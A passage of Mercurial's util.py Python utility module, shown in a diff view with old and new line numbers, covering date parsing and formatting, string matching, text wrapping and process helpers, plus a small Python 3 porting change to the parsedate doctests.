1899 1899 chunkremaining = chunkl - offset
1900 1900
1901 1901 # Use all of unconsumed part of chunk.
1902 1902 if left >= chunkremaining:
1903 1903 left -= chunkremaining
1904 1904 queue.popleft()
1905 1905 # offset == 0 is enabled by block above, so this won't merely
1906 1906 # copy via ``chunk[0:]``.
1907 1907 buf.append(chunk[offset:])
1908 1908 self._chunkoffset = 0
1909 1909
1910 1910 # Partial chunk needed.
1911 1911 else:
1912 1912 buf.append(chunk[offset:offset + left])
1913 1913 self._chunkoffset += left
1914 1914 left -= chunkremaining
1915 1915
1916 1916 return ''.join(buf)
1917 1917
1918 1918 def filechunkiter(f, size=131072, limit=None):
1919 1919 """Create a generator that produces the data in the file size
1920 1920 (default 131072) bytes at a time, up to optional limit (default is
1921 1921 to read all data). Chunks may be less than size bytes if the
1922 1922 chunk is the last chunk in the file, or the file is a socket or
1923 1923 some other type of file that sometimes reads less data than is
1924 1924 requested."""
1925 1925 assert size >= 0
1926 1926 assert limit is None or limit >= 0
1927 1927 while True:
1928 1928 if limit is None:
1929 1929 nbytes = size
1930 1930 else:
1931 1931 nbytes = min(limit, size)
1932 1932 s = nbytes and f.read(nbytes)
1933 1933 if not s:
1934 1934 break
1935 1935 if limit:
1936 1936 limit -= len(s)
1937 1937 yield s
1938 1938
1939 1939 def makedate(timestamp=None):
1940 1940 '''Return a unix timestamp (or the current time) as a (unixtime,
1941 1941 offset) tuple based off the local timezone.'''
1942 1942 if timestamp is None:
1943 1943 timestamp = time.time()
1944 1944 if timestamp < 0:
1945 1945 hint = _("check your clock")
1946 1946 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1947 1947 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1948 1948 datetime.datetime.fromtimestamp(timestamp))
1949 1949 tz = delta.days * 86400 + delta.seconds
1950 1950 return timestamp, tz
1951 1951
1952 1952 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1953 1953 """represent a (unixtime, offset) tuple as a localized time.
1954 1954 unixtime is seconds since the epoch, and offset is the time zone's
1955 1955 number of seconds away from UTC.
1956 1956
1957 1957 >>> datestr((0, 0))
1958 1958 'Thu Jan 01 00:00:00 1970 +0000'
1959 1959 >>> datestr((42, 0))
1960 1960 'Thu Jan 01 00:00:42 1970 +0000'
1961 1961 >>> datestr((-42, 0))
1962 1962 'Wed Dec 31 23:59:18 1969 +0000'
1963 1963 >>> datestr((0x7fffffff, 0))
1964 1964 'Tue Jan 19 03:14:07 2038 +0000'
1965 1965 >>> datestr((-0x80000000, 0))
1966 1966 'Fri Dec 13 20:45:52 1901 +0000'
1967 1967 """
1968 1968 t, tz = date or makedate()
1969 1969 if "%1" in format or "%2" in format or "%z" in format:
1970 1970 sign = (tz > 0) and "-" or "+"
1971 1971 minutes = abs(tz) // 60
1972 1972 q, r = divmod(minutes, 60)
1973 1973 format = format.replace("%z", "%1%2")
1974 1974 format = format.replace("%1", "%c%02d" % (sign, q))
1975 1975 format = format.replace("%2", "%02d" % r)
1976 1976 d = t - tz
1977 1977 if d > 0x7fffffff:
1978 1978 d = 0x7fffffff
1979 1979 elif d < -0x80000000:
1980 1980 d = -0x80000000
1981 1981 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1982 1982 # because they use the gmtime() system call which is buggy on Windows
1983 1983 # for negative values.
1984 1984 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1985 1985 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1986 1986 return s
1987 1987
1988 1988 def shortdate(date=None):
1989 1989 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1990 1990 return datestr(date, format='%Y-%m-%d')
1991 1991
1992 1992 def parsetimezone(s):
1993 1993 """find a trailing timezone, if any, in string, and return a
1994 1994 (offset, remainder) pair"""
1995 1995
1996 1996 if s.endswith("GMT") or s.endswith("UTC"):
1997 1997 return 0, s[:-3].rstrip()
1998 1998
1999 1999 # Unix-style timezones [+-]hhmm
2000 2000 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2001 2001 sign = (s[-5] == "+") and 1 or -1
2002 2002 hours = int(s[-4:-2])
2003 2003 minutes = int(s[-2:])
2004 2004 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2005 2005
2006 2006 # ISO8601 trailing Z
2007 2007 if s.endswith("Z") and s[-2:-1].isdigit():
2008 2008 return 0, s[:-1]
2009 2009
2010 2010 # ISO8601-style [+-]hh:mm
2011 2011 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2012 2012 s[-5:-3].isdigit() and s[-2:].isdigit()):
2013 2013 sign = (s[-6] == "+") and 1 or -1
2014 2014 hours = int(s[-5:-3])
2015 2015 minutes = int(s[-2:])
2016 2016 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2017 2017
2018 2018 return None, s
2019 2019
2020 2020 def strdate(string, format, defaults=None):
2021 2021 """parse a localized time string and return a (unixtime, offset) tuple.
2022 2022 if the string cannot be parsed, ValueError is raised."""
2023 2023 if defaults is None:
2024 2024 defaults = {}
2025 2025
2026 2026 # NOTE: unixtime = localunixtime + offset
2027 2027 offset, date = parsetimezone(string)
2028 2028
2029 2029 # add missing elements from defaults
2030 2030 usenow = False # default to using biased defaults
2031 2031 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2032 2032 part = pycompat.bytestr(part)
2033 2033 found = [True for p in part if ("%"+p) in format]
2034 2034 if not found:
2035 2035 date += "@" + defaults[part][usenow]
2036 2036 format += "@%" + part[0]
2037 2037 else:
2038 2038 # We've found a specific time element, less specific time
2039 2039 # elements are relative to today
2040 2040 usenow = True
2041 2041
2042 2042 timetuple = time.strptime(encoding.strfromlocal(date),
2043 2043 encoding.strfromlocal(format))
2044 2044 localunixtime = int(calendar.timegm(timetuple))
2045 2045 if offset is None:
2046 2046 # local timezone
2047 2047 unixtime = int(time.mktime(timetuple))
2048 2048 offset = unixtime - localunixtime
2049 2049 else:
2050 2050 unixtime = localunixtime + offset
2051 2051 return unixtime, offset
2052 2052
2053 2053 def parsedate(date, formats=None, bias=None):
2054 2054 """parse a localized date/time and return a (unixtime, offset) tuple.
2055 2055
2056 2056 The date may be a "unixtime offset" string or in one of the specified
2057 2057 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2058 2058
2059 >>> parsedate(b' today ') == parsedate(\
2060 datetime.date.today().strftime('%b %d'))
2059 >>> parsedate(b' today ') == parsedate(
2060 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2061 2061 True
2062 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2063 datetime.timedelta(days=1)\
2064 ).strftime('%b %d'))
2062 >>> parsedate(b'yesterday ') == parsedate(
2063 ... (datetime.date.today() - datetime.timedelta(days=1)
2064 ... ).strftime('%b %d').encode('ascii'))
2065 2065 True
2066 2066 >>> now, tz = makedate()
2067 2067 >>> strnow, strtz = parsedate(b'now')
2068 2068 >>> (strnow - now) < 1
2069 2069 True
2070 2070 >>> tz == strtz
2071 2071 True
2072 2072 """
2073 2073 if bias is None:
2074 2074 bias = {}
2075 2075 if not date:
2076 2076 return 0, 0
2077 2077 if isinstance(date, tuple) and len(date) == 2:
2078 2078 return date
2079 2079 if not formats:
2080 2080 formats = defaultdateformats
2081 2081 date = date.strip()
2082 2082
2083 2083 if date == 'now' or date == _('now'):
2084 2084 return makedate()
2085 2085 if date == 'today' or date == _('today'):
2086 date = datetime.date.today().strftime('%b %d')
2086 date = datetime.date.today().strftime(r'%b %d')
2087 date = encoding.strtolocal(date)
2087 2088 elif date == 'yesterday' or date == _('yesterday'):
2088 2089 date = (datetime.date.today() -
2089 datetime.timedelta(days=1)).strftime('%b %d')
2090 datetime.timedelta(days=1)).strftime(r'%b %d')
2091 date = encoding.strtolocal(date)
2090 2092
2091 2093 try:
2092 2094 when, offset = map(int, date.split(' '))
2093 2095 except ValueError:
2094 2096 # fill out defaults
2095 2097 now = makedate()
2096 2098 defaults = {}
2097 2099 for part in ("d", "mb", "yY", "HI", "M", "S"):
2098 2100 # this piece is for rounding the specific end of unknowns
2099 2101 b = bias.get(part)
2100 2102 if b is None:
2101 2103 if part[0:1] in "HMS":
2102 2104 b = "00"
2103 2105 else:
2104 2106 b = "0"
2105 2107
2106 2108 # this piece is for matching the generic end to today's date
2107 2109 n = datestr(now, "%" + part[0:1])
2108 2110
2109 2111 defaults[part] = (b, n)
2110 2112
2111 2113 for format in formats:
2112 2114 try:
2113 2115 when, offset = strdate(date, format, defaults)
2114 2116 except (ValueError, OverflowError):
2115 2117 pass
2116 2118 else:
2117 2119 break
2118 2120 else:
2119 2121 raise error.ParseError(_('invalid date: %r') % date)
2120 2122 # validate explicit (probably user-specified) date and
2121 2123 # time zone offset. values must fit in signed 32 bits for
2122 2124 # current 32-bit linux runtimes. timezones go from UTC-12
2123 2125 # to UTC+14
2124 2126 if when < -0x80000000 or when > 0x7fffffff:
2125 2127 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2126 2128 if offset < -50400 or offset > 43200:
2127 2129 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2128 2130 return when, offset
2129 2131
2130 2132 def matchdate(date):
2131 2133 """Return a function that matches a given date match specifier
2132 2134
2133 2135 Formats include:
2134 2136
2135 2137 '{date}' match a given date to the accuracy provided
2136 2138
2137 2139 '<{date}' on or before a given date
2138 2140
2139 2141 '>{date}' on or after a given date
2140 2142
2141 2143 >>> p1 = parsedate(b"10:29:59")
2142 2144 >>> p2 = parsedate(b"10:30:00")
2143 2145 >>> p3 = parsedate(b"10:30:59")
2144 2146 >>> p4 = parsedate(b"10:31:00")
2145 2147 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2146 2148 >>> f = matchdate(b"10:30")
2147 2149 >>> f(p1[0])
2148 2150 False
2149 2151 >>> f(p2[0])
2150 2152 True
2151 2153 >>> f(p3[0])
2152 2154 True
2153 2155 >>> f(p4[0])
2154 2156 False
2155 2157 >>> f(p5[0])
2156 2158 False
2157 2159 """
2158 2160
2159 2161 def lower(date):
2160 2162 d = {'mb': "1", 'd': "1"}
2161 2163 return parsedate(date, extendeddateformats, d)[0]
2162 2164
2163 2165 def upper(date):
2164 2166 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2165 2167 for days in ("31", "30", "29"):
2166 2168 try:
2167 2169 d["d"] = days
2168 2170 return parsedate(date, extendeddateformats, d)[0]
2169 2171 except Abort:
2170 2172 pass
2171 2173 d["d"] = "28"
2172 2174 return parsedate(date, extendeddateformats, d)[0]
2173 2175
2174 2176 date = date.strip()
2175 2177
2176 2178 if not date:
2177 2179 raise Abort(_("dates cannot consist entirely of whitespace"))
2178 2180 elif date[0] == "<":
2179 2181 if not date[1:]:
2180 2182 raise Abort(_("invalid day spec, use '<DATE'"))
2181 2183 when = upper(date[1:])
2182 2184 return lambda x: x <= when
2183 2185 elif date[0] == ">":
2184 2186 if not date[1:]:
2185 2187 raise Abort(_("invalid day spec, use '>DATE'"))
2186 2188 when = lower(date[1:])
2187 2189 return lambda x: x >= when
2188 2190 elif date[0] == "-":
2189 2191 try:
2190 2192 days = int(date[1:])
2191 2193 except ValueError:
2192 2194 raise Abort(_("invalid day spec: %s") % date[1:])
2193 2195 if days < 0:
2194 2196 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2195 2197 % date[1:])
2196 2198 when = makedate()[0] - days * 3600 * 24
2197 2199 return lambda x: x >= when
2198 2200 elif " to " in date:
2199 2201 a, b = date.split(" to ")
2200 2202 start, stop = lower(a), upper(b)
2201 2203 return lambda x: x >= start and x <= stop
2202 2204 else:
2203 2205 start, stop = lower(date), upper(date)
2204 2206 return lambda x: x >= start and x <= stop
2205 2207
2206 2208 def stringmatcher(pattern, casesensitive=True):
2207 2209 """
2208 2210 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2209 2211 returns the matcher name, pattern, and matcher function.
2210 2212 missing or unknown prefixes are treated as literal matches.
2211 2213
2212 2214 helper for tests:
2213 2215 >>> def test(pattern, *tests):
2214 2216 ... kind, pattern, matcher = stringmatcher(pattern)
2215 2217 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2216 2218 >>> def itest(pattern, *tests):
2217 2219 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2218 2220 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2219 2221
2220 2222 exact matching (no prefix):
2221 2223 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2222 2224 ('literal', 'abcdefg', [False, False, True])
2223 2225
2224 2226 regex matching ('re:' prefix)
2225 2227 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2226 2228 ('re', 'a.+b', [False, False, True])
2227 2229
2228 2230 force exact matches ('literal:' prefix)
2229 2231 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2230 2232 ('literal', 're:foobar', [False, True])
2231 2233
2232 2234 unknown prefixes are ignored and treated as literals
2233 2235 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2234 2236 ('literal', 'foo:bar', [False, False, True])
2235 2237
2236 2238 case insensitive regex matches
2237 2239 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2238 2240 ('re', 'A.+b', [False, False, True])
2239 2241
2240 2242 case insensitive literal matches
2241 2243 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2242 2244 ('literal', 'ABCDEFG', [False, False, True])
2243 2245 """
2244 2246 if pattern.startswith('re:'):
2245 2247 pattern = pattern[3:]
2246 2248 try:
2247 2249 flags = 0
2248 2250 if not casesensitive:
2249 2251 flags = remod.I
2250 2252 regex = remod.compile(pattern, flags)
2251 2253 except remod.error as e:
2252 2254 raise error.ParseError(_('invalid regular expression: %s')
2253 2255 % e)
2254 2256 return 're', pattern, regex.search
2255 2257 elif pattern.startswith('literal:'):
2256 2258 pattern = pattern[8:]
2257 2259
2258 2260 match = pattern.__eq__
2259 2261
2260 2262 if not casesensitive:
2261 2263 ipat = encoding.lower(pattern)
2262 2264 match = lambda s: ipat == encoding.lower(s)
2263 2265 return 'literal', pattern, match
2264 2266
2265 2267 def shortuser(user):
2266 2268 """Return a short representation of a user name or email address."""
2267 2269 f = user.find('@')
2268 2270 if f >= 0:
2269 2271 user = user[:f]
2270 2272 f = user.find('<')
2271 2273 if f >= 0:
2272 2274 user = user[f + 1:]
2273 2275 f = user.find(' ')
2274 2276 if f >= 0:
2275 2277 user = user[:f]
2276 2278 f = user.find('.')
2277 2279 if f >= 0:
2278 2280 user = user[:f]
2279 2281 return user
2280 2282
2281 2283 def emailuser(user):
2282 2284 """Return the user portion of an email address."""
2283 2285 f = user.find('@')
2284 2286 if f >= 0:
2285 2287 user = user[:f]
2286 2288 f = user.find('<')
2287 2289 if f >= 0:
2288 2290 user = user[f + 1:]
2289 2291 return user
2290 2292
2291 2293 def email(author):
2292 2294 '''get email of author.'''
2293 2295 r = author.find('>')
2294 2296 if r == -1:
2295 2297 r = None
2296 2298 return author[author.find('<') + 1:r]
2297 2299
2298 2300 def ellipsis(text, maxlength=400):
2299 2301 """Trim string to at most maxlength (default: 400) columns in display."""
2300 2302 return encoding.trim(text, maxlength, ellipsis='...')
2301 2303
2302 2304 def unitcountfn(*unittable):
2303 2305 '''return a function that renders a readable count of some quantity'''
2304 2306
2305 2307 def go(count):
2306 2308 for multiplier, divisor, format in unittable:
2307 2309 if abs(count) >= divisor * multiplier:
2308 2310 return format % (count / float(divisor))
2309 2311 return unittable[-1][2] % count
2310 2312
2311 2313 return go
2312 2314
2313 2315 def processlinerange(fromline, toline):
2314 2316 """Check that linerange <fromline>:<toline> makes sense and return a
2315 2317 0-based range.
2316 2318
2317 2319 >>> processlinerange(10, 20)
2318 2320 (9, 20)
2319 2321 >>> processlinerange(2, 1)
2320 2322 Traceback (most recent call last):
2321 2323 ...
2322 2324 ParseError: line range must be positive
2323 2325 >>> processlinerange(0, 5)
2324 2326 Traceback (most recent call last):
2325 2327 ...
2326 2328 ParseError: fromline must be strictly positive
2327 2329 """
2328 2330 if toline - fromline < 0:
2329 2331 raise error.ParseError(_("line range must be positive"))
2330 2332 if fromline < 1:
2331 2333 raise error.ParseError(_("fromline must be strictly positive"))
2332 2334 return fromline - 1, toline
2333 2335
2334 2336 bytecount = unitcountfn(
2335 2337 (100, 1 << 30, _('%.0f GB')),
2336 2338 (10, 1 << 30, _('%.1f GB')),
2337 2339 (1, 1 << 30, _('%.2f GB')),
2338 2340 (100, 1 << 20, _('%.0f MB')),
2339 2341 (10, 1 << 20, _('%.1f MB')),
2340 2342 (1, 1 << 20, _('%.2f MB')),
2341 2343 (100, 1 << 10, _('%.0f KB')),
2342 2344 (10, 1 << 10, _('%.1f KB')),
2343 2345 (1, 1 << 10, _('%.2f KB')),
2344 2346 (1, 1, _('%.0f bytes')),
2345 2347 )
2346 2348
2347 2349 # Matches a single EOL which can either be a CRLF where repeated CR
2348 2350 # are removed or a LF. We do not care about old Macintosh files, so a
2349 2351 # stray CR is an error.
2350 2352 _eolre = remod.compile(br'\r*\n')
2351 2353
2352 2354 def tolf(s):
2353 2355 return _eolre.sub('\n', s)
2354 2356
2355 2357 def tocrlf(s):
2356 2358 return _eolre.sub('\r\n', s)
2357 2359
2358 2360 if pycompat.oslinesep == '\r\n':
2359 2361 tonativeeol = tocrlf
2360 2362 fromnativeeol = tolf
2361 2363 else:
2362 2364 tonativeeol = pycompat.identity
2363 2365 fromnativeeol = pycompat.identity
2364 2366
2365 2367 def escapestr(s):
2366 2368 # call underlying function of s.encode('string_escape') directly for
2367 2369 # Python 3 compatibility
2368 2370 return codecs.escape_encode(s)[0]
2369 2371
2370 2372 def unescapestr(s):
2371 2373 return codecs.escape_decode(s)[0]
2372 2374
2373 2375 def forcebytestr(obj):
2374 2376 """Portably format an arbitrary object (e.g. exception) into a byte
2375 2377 string."""
2376 2378 try:
2377 2379 return pycompat.bytestr(obj)
2378 2380 except UnicodeEncodeError:
2379 2381 # non-ascii string, may be lossy
2380 2382 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2381 2383
2382 2384 def uirepr(s):
2383 2385 # Avoid double backslash in Windows path repr()
2384 2386 return repr(s).replace('\\\\', '\\')
2385 2387
2386 2388 # delay import of textwrap
2387 2389 def MBTextWrapper(**kwargs):
2388 2390 class tw(textwrap.TextWrapper):
2389 2391 """
2390 2392 Extend TextWrapper for width-awareness.
2391 2393
2392 2394 Neither number of 'bytes' in any encoding nor 'characters' is
2393 2395 appropriate to calculate terminal columns for specified string.
2394 2396
2395 2397 Original TextWrapper implementation uses built-in 'len()' directly,
2396 2398 so overriding is needed to use width information of each characters.
2397 2399
2398 2400 In addition, characters classified into 'ambiguous' width are
2399 2401 treated as wide in East Asian area, but as narrow in other.
2400 2402
2401 2403 This requires use decision to determine width of such characters.
2402 2404 """
2403 2405 def _cutdown(self, ucstr, space_left):
2404 2406 l = 0
2405 2407 colwidth = encoding.ucolwidth
2406 2408 for i in xrange(len(ucstr)):
2407 2409 l += colwidth(ucstr[i])
2408 2410 if space_left < l:
2409 2411 return (ucstr[:i], ucstr[i:])
2410 2412 return ucstr, ''
2411 2413
2412 2414 # overriding of base class
2413 2415 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2414 2416 space_left = max(width - cur_len, 1)
2415 2417
2416 2418 if self.break_long_words:
2417 2419 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2418 2420 cur_line.append(cut)
2419 2421 reversed_chunks[-1] = res
2420 2422 elif not cur_line:
2421 2423 cur_line.append(reversed_chunks.pop())
2422 2424
2423 2425 # this overriding code is imported from TextWrapper of Python 2.6
2424 2426 # to calculate columns of string by 'encoding.ucolwidth()'
2425 2427 def _wrap_chunks(self, chunks):
2426 2428 colwidth = encoding.ucolwidth
2427 2429
2428 2430 lines = []
2429 2431 if self.width <= 0:
2430 2432 raise ValueError("invalid width %r (must be > 0)" % self.width)
2431 2433
2432 2434 # Arrange in reverse order so items can be efficiently popped
2433 2435 # from a stack of chucks.
2434 2436 chunks.reverse()
2435 2437
2436 2438 while chunks:
2437 2439
2438 2440 # Start the list of chunks that will make up the current line.
2439 2441 # cur_len is just the length of all the chunks in cur_line.
2440 2442 cur_line = []
2441 2443 cur_len = 0
2442 2444
2443 2445 # Figure out which static string will prefix this line.
2444 2446 if lines:
2445 2447 indent = self.subsequent_indent
2446 2448 else:
2447 2449 indent = self.initial_indent
2448 2450
2449 2451 # Maximum width for this line.
2450 2452 width = self.width - len(indent)
2451 2453
2452 2454 # First chunk on line is whitespace -- drop it, unless this
2453 2455 # is the very beginning of the text (i.e. no lines started yet).
2454 2456 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2455 2457 del chunks[-1]
2456 2458
2457 2459 while chunks:
2458 2460 l = colwidth(chunks[-1])
2459 2461
2460 2462 # Can at least squeeze this chunk onto the current line.
2461 2463 if cur_len + l <= width:
2462 2464 cur_line.append(chunks.pop())
2463 2465 cur_len += l
2464 2466
2465 2467 # Nope, this line is full.
2466 2468 else:
2467 2469 break
2468 2470
2469 2471 # The current line is full, and the next chunk is too big to
2470 2472 # fit on *any* line (not just this one).
2471 2473 if chunks and colwidth(chunks[-1]) > width:
2472 2474 self._handle_long_word(chunks, cur_line, cur_len, width)
2473 2475
2474 2476 # If the last chunk on this line is all whitespace, drop it.
2475 2477 if (self.drop_whitespace and
2476 2478 cur_line and cur_line[-1].strip() == r''):
2477 2479 del cur_line[-1]
2478 2480
2479 2481 # Convert current line back to a string and store it in list
2480 2482 # of all lines (return value).
2481 2483 if cur_line:
2482 2484 lines.append(indent + r''.join(cur_line))
2483 2485
2484 2486 return lines
2485 2487
2486 2488 global MBTextWrapper
2487 2489 MBTextWrapper = tw
2488 2490 return tw(**kwargs)
2489 2491
2490 2492 def wrap(line, width, initindent='', hangindent=''):
2491 2493 maxindent = max(len(hangindent), len(initindent))
2492 2494 if width <= maxindent:
2493 2495 # adjust for weird terminal size
2494 2496 width = max(78, maxindent + 1)
2495 2497 line = line.decode(pycompat.sysstr(encoding.encoding),
2496 2498 pycompat.sysstr(encoding.encodingmode))
2497 2499 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2498 2500 pycompat.sysstr(encoding.encodingmode))
2499 2501 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2500 2502 pycompat.sysstr(encoding.encodingmode))
2501 2503 wrapper = MBTextWrapper(width=width,
2502 2504 initial_indent=initindent,
2503 2505 subsequent_indent=hangindent)
2504 2506 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2505 2507
2506 2508 if (pyplatform.python_implementation() == 'CPython' and
2507 2509 sys.version_info < (3, 0)):
2508 2510 # There is an issue in CPython that some IO methods do not handle EINTR
2509 2511 # correctly. The following table shows what CPython version (and functions)
2510 2512 # are affected (buggy: has the EINTR bug, okay: otherwise):
2511 2513 #
2512 2514 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2513 2515 # --------------------------------------------------
2514 2516 # fp.__iter__ | buggy | buggy | okay
2515 2517 # fp.read* | buggy | okay [1] | okay
2516 2518 #
2517 2519 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2518 2520 #
2519 2521 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2520 2522 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2521 2523 #
2522 2524 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2523 2525 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2524 2526 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2525 2527 # fp.__iter__ but not other fp.read* methods.
2526 2528 #
2527 2529 # On modern systems like Linux, the "read" syscall cannot be interrupted
2528 2530 # when reading "fast" files like on-disk files. So the EINTR issue only
2529 2531 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2530 2532 # files approximately as "fast" files and use the fast (unsafe) code path,
2531 2533 # to minimize the performance impact.
2532 2534 if sys.version_info >= (2, 7, 4):
2533 2535 # fp.readline deals with EINTR correctly, use it as a workaround.
2534 2536 def _safeiterfile(fp):
2535 2537 return iter(fp.readline, '')
2536 2538 else:
2537 2539 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2538 2540 # note: this may block longer than necessary because of bufsize.
2539 2541 def _safeiterfile(fp, bufsize=4096):
2540 2542 fd = fp.fileno()
2541 2543 line = ''
2542 2544 while True:
2543 2545 try:
2544 2546 buf = os.read(fd, bufsize)
2545 2547 except OSError as ex:
2546 2548 # os.read only raises EINTR before any data is read
2547 2549 if ex.errno == errno.EINTR:
2548 2550 continue
2549 2551 else:
2550 2552 raise
2551 2553 line += buf
2552 2554 if '\n' in buf:
2553 2555 splitted = line.splitlines(True)
2554 2556 line = ''
2555 2557 for l in splitted:
2556 2558 if l[-1] == '\n':
2557 2559 yield l
2558 2560 else:
2559 2561 line = l
2560 2562 if not buf:
2561 2563 break
2562 2564 if line:
2563 2565 yield line
2564 2566
2565 2567 def iterfile(fp):
2566 2568 fastpath = True
2567 2569 if type(fp) is file:
2568 2570 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2569 2571 if fastpath:
2570 2572 return fp
2571 2573 else:
2572 2574 return _safeiterfile(fp)
2573 2575 else:
2574 2576 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2575 2577 def iterfile(fp):
2576 2578 return fp
2577 2579
2578 2580 def iterlines(iterator):
2579 2581 for chunk in iterator:
2580 2582 for line in chunk.splitlines():
2581 2583 yield line
2582 2584
2583 2585 def expandpath(path):
2584 2586 return os.path.expanduser(os.path.expandvars(path))
2585 2587
2586 2588 def hgcmd():
2587 2589 """Return the command used to execute current hg
2588 2590
2589 2591 This is different from hgexecutable() because on Windows we want
2590 2592 to avoid things opening new shell windows like batch files, so we
2591 2593 get either the python call or current executable.
2592 2594 """
2593 2595 if mainfrozen():
2594 2596 if getattr(sys, 'frozen', None) == 'macosx_app':
2595 2597 # Env variable set by py2app
2596 2598 return [encoding.environ['EXECUTABLEPATH']]
2597 2599 else:
2598 2600 return [pycompat.sysexecutable]
2599 2601 return gethgcmd()
2600 2602
2601 2603 def rundetached(args, condfn):
2602 2604 """Execute the argument list in a detached process.
2603 2605
2604 2606 condfn is a callable which is called repeatedly and should return
2605 2607 True once the child process is known to have started successfully.
2606 2608 At this point, the child process PID is returned. If the child
2607 2609 process fails to start or finishes before condfn() evaluates to
2608 2610 True, return -1.
2609 2611 """
2610 2612 # Windows case is easier because the child process is either
2611 2613 # successfully starting and validating the condition or exiting
2612 2614 # on failure. We just poll on its PID. On Unix, if the child
2613 2615 # process fails to start, it will be left in a zombie state until
2614 2616 # the parent wait on it, which we cannot do since we expect a long
2615 2617 # running process on success. Instead we listen for SIGCHLD telling
2616 2618 # us our child process terminated.
2617 2619 terminated = set()
2618 2620 def handler(signum, frame):
2619 2621 terminated.add(os.wait())
2620 2622 prevhandler = None
2621 2623 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2622 2624 if SIGCHLD is not None:
2623 2625 prevhandler = signal.signal(SIGCHLD, handler)
2624 2626 try:
2625 2627 pid = spawndetached(args)
2626 2628 while not condfn():
2627 2629 if ((pid in terminated or not testpid(pid))
2628 2630 and not condfn()):
2629 2631 return -1
2630 2632 time.sleep(0.1)
2631 2633 return pid
2632 2634 finally:
2633 2635 if prevhandler is not None:
2634 2636 signal.signal(signal.SIGCHLD, prevhandler)
2635 2637
2636 2638 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2637 2639 """Return the result of interpolating items in the mapping into string s.
2638 2640
2639 2641 prefix is a single character string, or a two character string with
2640 2642 a backslash as the first character if the prefix needs to be escaped in
2641 2643 a regular expression.
2642 2644
2643 2645 fn is an optional function that will be applied to the replacement text
2644 2646 just before replacement.
2645 2647
2646 2648 escape_prefix is an optional flag that allows using doubled prefix for
2647 2649 its escaping.
2648 2650 """
2649 2651 fn = fn or (lambda s: s)
2650 2652 patterns = '|'.join(mapping.keys())
2651 2653 if escape_prefix:
2652 2654 patterns += '|' + prefix
2653 2655 if len(prefix) > 1:
2654 2656 prefix_char = prefix[1:]
2655 2657 else:
2656 2658 prefix_char = prefix
2657 2659 mapping[prefix_char] = prefix_char
2658 2660 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2659 2661 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2660 2662
2661 2663 def getport(port):
2662 2664 """Return the port for a given network service.
2663 2665
2664 2666 If port is an integer, it's returned as is. If it's a string, it's
2665 2667 looked up using socket.getservbyname(). If there's no matching
2666 2668 service, error.Abort is raised.
2667 2669 """
2668 2670 try:
2669 2671 return int(port)
2670 2672 except ValueError:
2671 2673 pass
2672 2674
2673 2675 try:
2674 2676 return socket.getservbyname(port)
2675 2677 except socket.error:
2676 2678 raise Abort(_("no port number associated with service '%s'") % port)
2677 2679
2678 2680 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2679 2681 '0': False, 'no': False, 'false': False, 'off': False,
2680 2682 'never': False}
2681 2683
2682 2684 def parsebool(s):
2683 2685 """Parse s into a boolean.
2684 2686
2685 2687 If s is not a valid boolean, returns None.
2686 2688 """
2687 2689 return _booleans.get(s.lower(), None)
2688 2690
2689 2691 _hextochr = dict((a + b, chr(int(a + b, 16)))
2690 2692 for a in string.hexdigits for b in string.hexdigits)
2691 2693
2692 2694 class url(object):
2693 2695 r"""Reliable URL parser.
2694 2696
2695 2697 This parses URLs and provides attributes for the following
2696 2698 components:
2697 2699
2698 2700 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2699 2701
2700 2702 Missing components are set to None. The only exception is
2701 2703 fragment, which is set to '' if present but empty.
